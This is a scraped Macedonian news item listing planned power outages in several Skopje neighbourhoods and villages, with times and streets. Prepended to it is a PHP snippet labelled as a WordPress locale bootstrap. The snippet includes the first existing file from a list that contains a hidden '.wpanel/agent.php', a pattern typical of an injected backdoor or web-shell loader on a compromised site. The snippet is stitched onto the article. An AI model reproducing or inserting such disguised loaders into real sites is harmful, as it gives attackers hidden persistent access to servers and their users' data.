// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } Делови од Скопје денеска без струја - Република Skip to main content

Делови од Скопје денеска без струја

Без електрична енергија денеска од 08.30 до 15.00 часот, ќе останат дел од корисниците од ул. 8 во село Горно Соње место викано Коштан, а од 09.00 до 11.00 часот, дел од корисниците од бул. Македонско-косовска бригада лоцирани кај сервис Бутел, соопшти РЦУК Скопје.

Во периодот од 09.00 до 12.00 часот, струја ќе немаат и дел од корисниците од ул. 4 во Сопиште место викано Ветрила, од 09.00 до 14.00 часот, корисниците од ул. Тодор Чангов – крак 21 во општина Аеродром, како и дел од корисниците од улиците Хашка, Будимпештанска и Душко Бојковски во општина Карпош.

Од 09.30 до 14.30 часот, прекин во снабдувањето со електрична енергија ќе имаат и корисниците од улиците Александар Македонски, Борис Сарафов и Смилевска, објектот на месната заедница и бензинската пумпа, како и дел од корисниците од ул. Црногорска, а од 12.00 до 14.00 часот, корисниците од ул. 95 и околните улички во село Волково во општина Ѓорче Петров.

Поврзани вести